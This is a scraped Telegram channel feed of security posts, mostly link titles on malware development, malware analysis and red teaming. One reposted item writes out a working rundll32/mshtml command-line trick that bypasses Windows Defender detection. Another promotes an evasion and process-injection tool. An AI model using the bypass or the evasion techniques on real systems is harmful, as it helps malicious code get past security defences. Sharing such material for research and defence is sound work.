Source Byte
Kanalga Telegram’da o‘tish
هشیار کسی باید کز عشق بپرهیزد وین طبع که من دارم با عقل نیامیزد Saadi Shirazi 187
Ko'proq ko'rsatish7 846
Obunachilar
+124 soatlar
+287 kunlar
+16930 kunlar
Postlar arxiv
7 845
From CreateProcess() to NtCreateUserProcess()
Link
#malware_dev
———
@islemolecule_source
7 845
Repost from Proxy Bar
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass.
*
то есть было и пофиксили:
C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
магия запятой:
C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass7 845
Reverse engineering of Android Phoenix RAT
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
7 845
Coyote: A multi-stage banking Trojan abusing the Squirrel installer
Link
#malware_analysis
———
@islemolecule_source
7 845
Red team road map
Intern / junior / medium / senior
Red team needed concepts
Credit : Sohiel Hashemi ( red teamer )
https://xmind.app/m/9Zcnkq
#red_team ,
———
@islemolecule_source
7 845
Rdtsc ant-debugger instruction
Link
#malware_dev
#malware_analysis
———
@islemolecule_source
7 845
Windows Process Internals : A few Concepts to know before jumping on Memory Forensics
credit : Kirtar Oza
https://web.archive.org/web/20201117183039/https://eforensicsmag.com/windows-process-internals-a-few-concepts-to-know-before-jumping-on-memory-forensics-by-kirtar-oza/
#windows_internls . #memory_forensics
———
@islemolecule_source
7 845
Repost from CyberSecurityTechnologies
#Offensive_security
Indirect Dynamic Syscall, SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing + Api resolving from TIB + API hashing
https://github.com/reveng007/DarkWidow
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
